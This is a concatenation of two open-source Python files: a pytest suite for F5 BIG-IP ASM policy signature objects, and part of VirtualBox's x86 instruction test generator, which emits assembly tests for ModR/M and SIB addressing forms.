# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from f5.bigip.tm.asm.policies.signatures import Signature
from f5.sdk_exception import UnsupportedOperation
from requests.exceptions import HTTPError
class TestSignature(object):
def test_create_raises(self, policy):
with pytest.raises(UnsupportedOperation):
policy.signatures_s.signature.create()
def test_delete_raises(self, policy):
with pytest.raises(UnsupportedOperation):
policy.signatures_s.signature.delete()
def test_refresh(self, policy):
coll = policy.signatures_s.get_collection()
hashid = str(coll[1].id)
ws1 = policy.signatures_s.signature.load(id=hashid)
ws2 = policy.signatures_s.signature.load(id=hashid)
assert ws1.kind == ws2.kind
assert ws1.performStaging == ws2.performStaging
ws2.modify(performStaging=False)
assert ws1.performStaging is True
assert ws2.performStaging is False
ws1.refresh()
assert ws1.performStaging is False
def test_load_no_object(self, policy):
with pytest.raises(HTTPError) as err:
policy.signatures_s.signature.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, policy):
coll = policy.signatures_s.get_collection()
hashid = str(coll[1].id)
ws1 = policy.signatures_s.signature.load(id=hashid)
assert ws1.kind == 'tm:asm:policies:signatures:signaturestate'
assert ws1.performStaging is True
ws1.modify(performStaging=False)
assert ws1.performStaging is False
ws2 = policy.signatures_s.signature.load(id=ws1.id)
assert ws1.selfLink == ws2.selfLink
assert ws1.kind == ws2.kind
assert ws1.performStaging == ws2.performStaging
def test_signatures_subcollection(self, policy):
coll = policy.signatures_s.get_collection()
assert isinstance(coll, list)
assert len(coll)
assert isinstance(coll[0], Signature)
|
third_party/virtualbox/src/VBox/VMM/testcase/Instructions/InstructionTestGen.py | Fimbure/icebox-1 | 521 | 19031 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id: InstructionTestGen.py $
"""
Instruction Test Generator.
"""
from __future__ import print_function;
__copyright__ = \
"""
Copyright (C) 2012-2017 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
"""
__version__ = "$Revision: 118412 $";
# pylint: disable=C0103,R0913
# Standard python imports.
import io;
import os;
from optparse import OptionParser
import random;
import sys;
## @name Exit codes
## @{
RTEXITCODE_SUCCESS = 0;
RTEXITCODE_SYNTAX = 2;
## @}
## @name Various C macros we're used to.
## @{
UINT8_MAX = 0xff
UINT16_MAX = 0xffff
UINT32_MAX = 0xffffffff
UINT64_MAX = 0xffffffffffffffff
def RT_BIT_32(iBit): # pylint: disable=C0103
""" 32-bit one bit mask. """
return 1 << iBit;
def RT_BIT_64(iBit): # pylint: disable=C0103
""" 64-bit one bit mask. """
return 1 << iBit;
## @}
## @name ModR/M
## @{
X86_MODRM_RM_MASK = 0x07;
X86_MODRM_REG_MASK = 0x38;
X86_MODRM_REG_SMASK = 0x07;
X86_MODRM_REG_SHIFT = 3;
X86_MODRM_MOD_MASK = 0xc0;
X86_MODRM_MOD_SMASK = 0x03;
X86_MODRM_MOD_SHIFT = 6;
## @}
## @name SIB
## @{
X86_SIB_BASE_MASK = 0x07;
X86_SIB_INDEX_MASK = 0x38;
X86_SIB_INDEX_SMASK = 0x07;
X86_SIB_INDEX_SHIFT = 3;
X86_SIB_SCALE_MASK = 0xc0;
X86_SIB_SCALE_SMASK = 0x03;
X86_SIB_SCALE_SHIFT = 6;
## @}
## @name Prefixes
## @
X86_OP_PRF_CS = 0x2e;
X86_OP_PRF_SS = 0x36;
X86_OP_PRF_DS = 0x3e;
X86_OP_PRF_ES = 0x26;
X86_OP_PRF_FS = 0x64;
X86_OP_PRF_GS = 0x65;
X86_OP_PRF_SIZE_OP = 0x66;
X86_OP_PRF_SIZE_ADDR = 0x67;
X86_OP_PRF_LOCK = 0xf0;
X86_OP_PRF_REPNZ = 0xf2;
X86_OP_PRF_REPZ = 0xf3;
X86_OP_REX_B = 0x41;
X86_OP_REX_X = 0x42;
X86_OP_REX_R = 0x44;
X86_OP_REX_W = 0x48;
## @}
## @name General registers
## @
X86_GREG_xAX = 0
X86_GREG_xCX = 1
X86_GREG_xDX = 2
X86_GREG_xBX = 3
X86_GREG_xSP = 4
X86_GREG_xBP = 5
X86_GREG_xSI = 6
X86_GREG_xDI = 7
X86_GREG_x8 = 8
X86_GREG_x9 = 9
X86_GREG_x10 = 10
X86_GREG_x11 = 11
X86_GREG_x12 = 12
X86_GREG_x13 = 13
X86_GREG_x14 = 14
X86_GREG_x15 = 15
## @}
## @name Register names.
## @{
g_asGRegs64NoSp = ('rax', 'rcx', 'rdx', 'rbx', None, 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15');
g_asGRegs64 = ('rax', 'rcx', 'rdx', 'rbx', 'rsp', 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15');
g_asGRegs32NoSp = ('eax', 'ecx', 'edx', 'ebx', None, 'ebp', 'esi', 'edi',
'r8d', 'r9d', 'r10d', 'r11d', 'r12d', 'r13d', 'r14d', 'r15d');
g_asGRegs32 = ('eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi',
'r8d', 'r9d', 'r10d', 'r11d', 'r12d', 'r13d', 'r14d', 'r15d');
g_asGRegs16NoSp = ('ax', 'cx', 'dx', 'bx', None, 'bp', 'si', 'di',
'r8w', 'r9w', 'r10w', 'r11w', 'r12w', 'r13w', 'r14w', 'r15w');
g_asGRegs16 = ('ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di',
'r8w', 'r9w', 'r10w', 'r11w', 'r12w', 'r13w', 'r14w', 'r15w');
g_asGRegs8 = ('al', 'cl', 'dl', 'bl', 'ah', 'ch', 'dh', 'bh');
g_asGRegs8Rex = ('al', 'cl', 'dl', 'bl', 'spl', 'bpl', 'sil', 'dil',
'r8b', 'r9b', 'r10b', 'r11b', 'r12b', 'r13b', 'r14b', 'r15b',
'ah', 'ch', 'dh', 'bh');
## @}
## @name EFLAGS/RFLAGS/EFLAGS
## @{
X86_EFL_CF = RT_BIT_32(0);
X86_EFL_CF_BIT = 0;
X86_EFL_1 = RT_BIT_32(1);
X86_EFL_PF = RT_BIT_32(2);
X86_EFL_AF = RT_BIT_32(4);
X86_EFL_AF_BIT = 4;
X86_EFL_ZF = RT_BIT_32(6);
X86_EFL_ZF_BIT = 6;
X86_EFL_SF = RT_BIT_32(7);
X86_EFL_SF_BIT = 7;
X86_EFL_TF = RT_BIT_32(8);
X86_EFL_IF = RT_BIT_32(9);
X86_EFL_DF = RT_BIT_32(10);
X86_EFL_OF = RT_BIT_32(11);
X86_EFL_OF_BIT = 11;
X86_EFL_IOPL = (RT_BIT_32(12) | RT_BIT_32(13));
X86_EFL_NT = RT_BIT_32(14);
X86_EFL_RF = RT_BIT_32(16);
X86_EFL_VM = RT_BIT_32(17);
X86_EFL_AC = RT_BIT_32(18);
X86_EFL_VIF = RT_BIT_32(19);
X86_EFL_VIP = RT_BIT_32(20);
X86_EFL_ID = RT_BIT_32(21);
X86_EFL_LIVE_MASK = 0x003f7fd5;
X86_EFL_RA1_MASK = RT_BIT_32(1);
X86_EFL_IOPL_SHIFT = 12;
X86_EFL_STATUS_BITS = ( X86_EFL_CF | X86_EFL_PF | X86_EFL_AF | X86_EFL_ZF | X86_EFL_SF | X86_EFL_OF );
## @}
## @name Random
## @{
g_iMyRandSeed = int((os.urandom(4)).encode('hex'), 16);
#g_iMyRandSeed = 286523426;
#g_iMyRandSeed = 1994382324;
g_oMyRand = random.Random(g_iMyRandSeed);
#g_oMyRand = random.SystemRandom();
def randU8():
""" Unsigned 8-bit random number. """
return g_oMyRand.getrandbits(8);
def randU16():
""" Unsigned 16-bit random number. """
return g_oMyRand.getrandbits(16);
def randU32():
""" Unsigned 32-bit random number. """
return g_oMyRand.getrandbits(32);
def randU64():
""" Unsigned 64-bit random number. """
return g_oMyRand.getrandbits(64);
def randUxx(cBits):
""" Unsigned 8-, 16-, 32-, or 64-bit random number. """
return g_oMyRand.getrandbits(cBits);
def randSxx(cBits):
""" Signed 8-, 16-, 32-, or 64-bit random number. """
uVal = randUxx(cBits);
iRet = uVal & ((1 << (cBits - 1)) - 1);
if iRet != uVal:
iRet = -iRet;
return iRet;
def randUxxList(cBits, cElements):
""" List of unsigned 8-, 16-, 32-, or 64-bit random numbers. """
return [randUxx(cBits) for _ in range(cElements)];
## @}
## @name Instruction Emitter Helpers
## @{
def calcRexPrefixForTwoModRmRegs(iReg, iRm, bOtherRexPrefixes = 0):
"""
Calculates a rex prefix if neccessary given the two registers
and optional rex size prefixes.
Returns an empty array if not necessary.
"""
bRex = bOtherRexPrefixes;
if iReg >= 8:
bRex |= X86_OP_REX_R;
if iRm >= 8:
bRex |= X86_OP_REX_B;
if bRex == 0:
return [];
return [bRex,];
def calcModRmForTwoRegs(iReg, iRm):
"""
Calculate the RM byte for two registers.
Returns an array with one byte in it.
"""
bRm = (0x3 << X86_MODRM_MOD_SHIFT) \
| ((iReg << X86_MODRM_REG_SHIFT) & X86_MODRM_REG_MASK) \
| (iRm & X86_MODRM_RM_MASK);
return [bRm,];
## @}
## @name Misc
## @{
def convU32ToSigned(u32):
""" Converts a 32-bit unsigned value to 32-bit signed. """
if u32 < 0x80000000:
return u32;
return u32 - UINT32_MAX - 1;
def rotateLeftUxx(cBits, uVal, cShift):
""" Rotate a xx-bit wide unsigned number to the left. """
assert cShift < cBits;
if cBits == 16:
uMask = UINT16_MAX;
elif cBits == 32:
uMask = UINT32_MAX;
elif cBits == 64:
uMask = UINT64_MAX;
else:
assert cBits == 8;
uMask = UINT8_MAX;
uVal &= uMask;
uRet = (uVal << cShift) & uMask;
uRet |= (uVal >> (cBits - cShift));
return uRet;
def rotateRightUxx(cBits, uVal, cShift):
""" Rotate a xx-bit wide unsigned number to the right. """
assert cShift < cBits;
if cBits == 16:
uMask = UINT16_MAX;
elif cBits == 32:
uMask = UINT32_MAX;
elif cBits == 64:
uMask = UINT64_MAX;
else:
assert cBits == 8;
uMask = UINT8_MAX;
uVal &= uMask;
uRet = (uVal >> cShift);
uRet |= (uVal << (cBits - cShift)) & uMask;
return uRet;
def gregName(iReg, cBits, fRexByteRegs = True):
""" Gets the name of a general register by index and width. """
if cBits == 64:
return g_asGRegs64[iReg];
if cBits == 32:
return g_asGRegs32[iReg];
if cBits == 16:
return g_asGRegs16[iReg];
assert cBits == 8;
if fRexByteRegs:
return g_asGRegs8Rex[iReg];
return g_asGRegs8[iReg];
## @}
class TargetEnv(object):
"""
Target Runtime Environment.
"""
## @name CPU Modes
## @{
ksCpuMode_Real = 'real';
ksCpuMode_Protect = 'prot';
ksCpuMode_Paged = 'paged';
ksCpuMode_Long = 'long';
ksCpuMode_V86 = 'v86';
## @}
## @name Instruction set.
## @{
ksInstrSet_16 = '16';
ksInstrSet_32 = '32';
ksInstrSet_64 = '64';
## @}
def __init__(self, sName,
sInstrSet = ksInstrSet_32,
sCpuMode = ksCpuMode_Paged,
iRing = 3,
):
self.sName = sName;
self.sInstrSet = sInstrSet;
self.sCpuMode = sCpuMode;
self.iRing = iRing;
self.asGRegs = g_asGRegs64 if self.is64Bit() else g_asGRegs32;
self.asGRegsNoSp = g_asGRegs64NoSp if self.is64Bit() else g_asGRegs32NoSp;
def isUsingIprt(self):
""" Whether it's an IPRT environment or not. """
return self.sName.startswith('iprt');
def is64Bit(self):
""" Whether it's a 64-bit environment or not. """
return self.sInstrSet == self.ksInstrSet_64;
def getDefOpBits(self):
""" Get the default operand size as a bit count. """
if self.sInstrSet == self.ksInstrSet_16:
return 16;
return 32;
def getDefOpBytes(self):
""" Get the default operand size as a byte count. """
return self.getDefOpBits() / 8;
def getMaxOpBits(self):
""" Get the max operand size as a bit count. """
if self.sInstrSet == self.ksInstrSet_64:
return 64;
return 32;
def getMaxOpBytes(self):
""" Get the max operand size as a byte count. """
return self.getMaxOpBits() / 8;
def getDefAddrBits(self):
""" Get the default address size as a bit count. """
if self.sInstrSet == self.ksInstrSet_16:
return 16;
if self.sInstrSet == self.ksInstrSet_32:
return 32;
return 64;
def getDefAddrBytes(self):
""" Get the default address size as a byte count. """
return self.getDefAddrBits() / 8;
def getGRegCount(self, cbEffBytes = 4):
""" Get the number of general registers. """
if self.sInstrSet == self.ksInstrSet_64:
if cbEffBytes == 1:
return 16 + 4;
return 16;
return 8;
def randGRegNoSp(self, cbEffBytes = 4):
""" Returns a random general register number, excluding the SP register. """
iReg = randU16() % self.getGRegCount(cbEffBytes);
while iReg == X86_GREG_xSP:
iReg = randU16() % self.getGRegCount(cbEffBytes);
return iReg;
def randGRegNoSpList(self, cItems, cbEffBytes = 4):
""" List of randGRegNoSp values. """
aiRegs = [];
for _ in range(cItems):
aiRegs.append(self.randGRegNoSp(cbEffBytes));
return aiRegs;
def getAddrModes(self):
""" Gets a list of addressing mode (16, 32, or/and 64). """
if self.sInstrSet == self.ksInstrSet_16:
return [16, 32];
if self.sInstrSet == self.ksInstrSet_32:
return [32, 16];
return [64, 32];
def is8BitHighGReg(self, cbEffOp, iGReg):
""" Checks if the given register is a high 8-bit general register (AH, CH, DH or BH). """
assert cbEffOp in [1, 2, 4, 8];
if cbEffOp == 1:
if iGReg >= 16:
return True;
if iGReg >= 4 and not self.is64Bit():
return True;
return False;
def gregNameBits(self, iReg, cBits):
""" Gets the name of the given register for the specified width (bits). """
return gregName(iReg, cBits, self.is64Bit());
def gregNameBytes(self, iReg, cbWidth):
""" Gets the name of the given register for the specified with (in bytes). """
return gregName(iReg, cbWidth * 8, self.is64Bit());
## Target environments.
g_dTargetEnvs = {
'iprt-r3-32': TargetEnv('iprt-r3-32', TargetEnv.ksInstrSet_32, TargetEnv.ksCpuMode_Protect, 3),
'iprt-r3-64': TargetEnv('iprt-r3-64', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 3),
'bs2-r0-64': TargetEnv('bs2-r0-64', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 0),
'bs2-r0-64-big': TargetEnv('bs2-r0-64-big', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 0),
'bs2-r0-32-big': TargetEnv('bs2-r0-32-big', TargetEnv.ksInstrSet_32, TargetEnv.ksCpuMode_Protect, 0),
};
class InstrTestBase(object):
"""
Base class for testing one instruction.
"""
def __init__(self, sName, sInstr = None):
self.sName = sName;
self.sInstr = sInstr if sInstr else sName.split()[0];
def isApplicable(self, oGen):
"""
Tests if the instruction test is applicable to the selected environment.
"""
_ = oGen;
return True;
def generateTest(self, oGen, sTestFnName):
"""
Emits the test assembly code.
"""
oGen.write(';; @todo not implemented. This is for the linter: %s, %s\n' % (oGen, sTestFnName));
return True;
def generateInputs(self, cbEffOp, cbMaxOp, oGen, fLong = False):
""" Generate a list of inputs. """
if fLong:
#
# Try do extremes as well as different ranges of random numbers.
#
auRet = [0, 1, ];
if cbMaxOp >= 1:
auRet += [ UINT8_MAX / 2, UINT8_MAX / 2 + 1, UINT8_MAX ];
if cbMaxOp >= 2:
auRet += [ UINT16_MAX / 2, UINT16_MAX / 2 + 1, UINT16_MAX ];
if cbMaxOp >= 4:
auRet += [ UINT32_MAX / 2, UINT32_MAX / 2 + 1, UINT32_MAX ];
if cbMaxOp >= 8:
auRet += [ UINT64_MAX / 2, UINT64_MAX / 2 + 1, UINT64_MAX ];
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
for cBits, cValues in ( (8, 4), (16, 4), (32, 8), (64, 8) ):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, cValues);
cWanted = 16;
elif oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
for cBits, cValues in ( (8, 8), (16, 8), (24, 2), (32, 16), (40, 1), (48, 1), (56, 1), (64, 16) ):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, cValues);
cWanted = 64;
else:
for cBits, cValues in ( (8, 16), (16, 16), (24, 4), (32, 64), (40, 4), (48, 4), (56, 4), (64, 64) ):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, cValues);
cWanted = 168;
if len(auRet) < cWanted:
auRet += randUxxList(cbEffOp * 8, cWanted - len(auRet));
else:
#
# Short list, just do some random numbers.
#
auRet = [];
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
auRet += randUxxList(cbMaxOp, 1);
elif oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
auRet += randUxxList(cbMaxOp, 2);
else:
auRet = [];
for cBits in (8, 16, 32, 64):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, 1);
return auRet;
class InstrTest_MemOrGreg_2_Greg(InstrTestBase):
"""
Instruction reading memory or general register and writing the result to a
general register.
"""
def __init__(self, sName, fnCalcResult, sInstr = None, acbOpVars = None):
InstrTestBase.__init__(self, sName, sInstr);
self.fnCalcResult = fnCalcResult;
self.acbOpVars = [ 1, 2, 4, 8 ] if not acbOpVars else list(acbOpVars);
self.fTestRegForm = True;
self.fTestMemForm = True;
## @name Test Instruction Writers
## @{
def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen):
""" Writes the instruction with two general registers as operands. """
oGen.write(' %s %s, %s\n'
% ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),));
return True;
def writeInstrGregPureRM(self, cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen):
""" Writes the instruction with two general registers as operands. """
oGen.write(' ');
if iOp2 == 13 and iMod == 0 and cAddrBits == 64:
oGen.write('altrexb '); # Alternative encoding for rip relative addressing.
oGen.write('%s %s, [' % (self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp),));
if (iOp2 == 5 or iOp2 == 13) and iMod == 0:
oGen.write('VBINSTST_NAME(g_u%sData)' % (cbEffOp * 8,))
if oGen.oTarget.is64Bit():
oGen.write(' wrt rip');
else:
if iMod == 1:
oGen.write('byte %d + ' % (offDisp,));
elif iMod == 2:
oGen.write('dword %d + ' % (offDisp,));
else:
assert iMod == 0;
if cAddrBits == 64:
oGen.write(g_asGRegs64[iOp2]);
elif cAddrBits == 32:
oGen.write(g_asGRegs32[iOp2]);
elif cAddrBits == 16:
assert False; ## @todo implement 16-bit addressing.
else:
assert False, str(cAddrBits);
oGen.write(']\n');
return True;
def writeInstrGregSibLabel(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes the instruction taking a register and a label (base only w/o reg), SIB form. """
assert offDisp is None; assert iBaseReg in [5, 13]; assert iIndexReg == 4; assert cAddrBits != 16;
if cAddrBits == 64:
# Note! Cannot test this in 64-bit mode in any sensible way because the disp is 32-bit
# and we cannot (yet) make assumtions about where we're loaded.
## @todo Enable testing this in environments where we can make assumptions (boot sector).
oGen.write(' %s %s, [VBINSTST_NAME(g_u%sData) xWrtRIP]\n'
% ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), cbEffOp * 8,));
else:
oGen.write(' altsibx%u %s %s, [VBINSTST_NAME(g_u%sData) xWrtRIP] ; iOp1=%s cbEffOp=%s\n'
% ( iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), cbEffOp * 8, iOp1, cbEffOp));
return True;
def writeInstrGregSibScaledReg(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes the instruction taking a register and disp+scaled register (no base reg), SIB form. """
assert iBaseReg in [5, 13]; assert iIndexReg != 4; assert cAddrBits != 16;
# Note! Using altsibxN to force scaled encoding. This is only really a
# necessity for iScale=1, but doesn't hurt for the rest.
oGen.write(' altsibx%u %s %s, [%s * %#x'
% (iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBits(iIndexReg, cAddrBits), iScale,));
if offDisp is not None:
oGen.write(' + %#x' % (offDisp,));
oGen.write(']\n');
_ = iBaseReg;
return True;
def writeInstrGregSibBase(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes the instruction taking a register and base only (with reg), SIB form. """
oGen.write(' altsibx%u %s %s, [%s'
% (iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBits(iBaseReg, cAddrBits),));
if offDisp is not None:
oGen.write(' + %#x' % (offDisp,));
oGen.write(']\n');
_ = iIndexReg;
return True;
def writeInstrGregSibBaseAndScaledReg(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes tinstruction taking a register and full featured SIB form address. """
# Note! From the looks of things, yasm will encode the following instructions the same way:
# mov eax, [rsi*1 + rbx]
# mov eax, [rbx + rsi*1]
# So, when there are two registers involved, the '*1' selects
# which is index and which is base.
oGen.write(' %s %s, [%s + %s * %u'
% ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp),
oGen.gregNameBits(iBaseReg, cAddrBits), oGen.gregNameBits(iIndexReg, cAddrBits), iScale,));
if offDisp is not None:
oGen.write(' + %#x' % (offDisp,));
oGen.write(']\n');
return True;
## @}
## @name Memory setups
## @{
def generateMemSetupReadByLabel(self, oGen, cbEffOp, uInput):
""" Sets up memory for a memory read. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(Common_SetupMemReadU%u)\n' % (cbEffOp*8,));
return True;
def generateMemSetupReadByReg(self, oGen, cAddrBits, cbEffOp, iReg1, uInput, offDisp = None):
""" Sets up memory for a memory read indirectly addressed thru one register and optional displacement. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iBaseReg = iReg1, offDisp = offDisp),));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iReg1],));
return True;
def generateMemSetupReadByScaledReg(self, oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp = None):
""" Sets up memory for a memory read indirectly addressed thru one register and optional displacement. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, offDisp = offDisp, iIndexReg = iIndexReg, iScale = iScale),));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iIndexReg],));
return True;
def generateMemSetupReadByBaseAndScaledReg(self, oGen, cAddrBits, cbEffOp, iBaseReg, iIndexReg, iScale, uInput, offDisp):
""" Sets up memory for a memory read indirectly addressed thru two registers with optional displacement. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iBaseReg = iBaseReg, offDisp = offDisp,
iIndexReg = iIndexReg, iScale = iScale),));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iIndexReg],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iBaseReg],));
return True;
def generateMemSetupPureRM(self, oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp = None):
""" Sets up memory for a pure R/M addressed read, iOp2 being the R/M value. """
oGen.pushConst(uInput);
assert offDisp is None or iMod != 0;
if (iOp2 != 5 and iOp2 != 13) or iMod != 0:
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iOp2, offDisp),));
else:
oGen.write(' call VBINSTST_NAME(Common_SetupMemReadU%u)\n' % (cbEffOp*8,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
return True;
## @}
def generateOneStdTestGregGreg(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult):
""" Generate one standard instr greg,greg test. """
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uInput,));
if iOp1X != iOp2X:
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
self.writeInstrGregGreg(cbEffOp, iOp1, iOp2, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1X, iOp2X if iOp1X != iOp2X else None),));
_ = cbMaxOp;
return True;
def generateOneStdTestGregGreg8BitHighPain(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput):
""" High 8-bit registers are a real pain! """
assert oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) or oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2);
# Figure out the register indexes of the max op sized regs involved.
iOp1X = iOp1 & 3;
iOp2X = iOp2 & 3;
oGen.write(' ; iOp1=%u iOp1X=%u iOp2=%u iOp2X=%u\n' % (iOp1, iOp1X, iOp2, iOp2X,));
# Calculate unshifted result.
if iOp1X != iOp2X:
uCur = oGen.auRegValues[iOp1X];
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8);
else:
uCur = uInput;
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) != oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8);
else:
uCur = rotateLeftUxx(cbMaxOp * 8, uCur, 8);
uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen);
# Rotate the input and/or result to match their max-op-sized registers.
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
uInput = rotateLeftUxx(cbMaxOp * 8, uInput, 8);
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
uResult = rotateLeftUxx(cbMaxOp * 8, uResult, 8);
# Hand it over to an overridable worker method.
return self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult);
def generateOneStdTestGregMemNoSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iOp2, uInput, uResult):
""" Generate mode 0, 1 and 2 test for the R/M=iOp2. """
if cAddrBits == 16:
_ = cbMaxOp;
else:
iMod = 0; # No disp, except for i=5.
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput);
self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, None, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
if iOp2 != 5 and iOp2 != 13:
iMod = 1;
for offDisp in oGen.getDispForMod(iMod):
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp);
self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
iMod = 2;
for offDisp in oGen.getDispForMod(iMod):
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp);
self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
return True;
def generateOneStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod, # pylint: disable=R0913
iBaseReg, iIndexReg, iScale, uInput, uResult):
""" Generate one SIB variations. """
for offDisp in oGen.getDispForMod(iMod, cbEffOp):
if ((iBaseReg == 5 or iBaseReg == 13) and iMod == 0):
if iIndexReg == 4:
if cAddrBits == 64:
continue; # skipping.
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupReadByLabel(oGen, cbEffOp, uInput);
self.writeInstrGregSibLabel(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1);
else:
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupReadByScaledReg(oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp);
self.writeInstrGregSibScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1, iIndexReg);
else:
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
if iIndexReg == 4:
self.generateMemSetupReadByReg(oGen, cAddrBits, cbEffOp, iBaseReg, uInput, offDisp);
self.writeInstrGregSibBase(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1, iBaseReg);
else:
if iIndexReg == iBaseReg and iScale == 1 and offDisp is not None and (offDisp & 1):
if offDisp < 0: offDisp += 1;
else: offDisp -= 1;
self.generateMemSetupReadByBaseAndScaledReg(oGen, cAddrBits, cbEffOp, iBaseReg,
iIndexReg, iScale, uInput, offDisp);
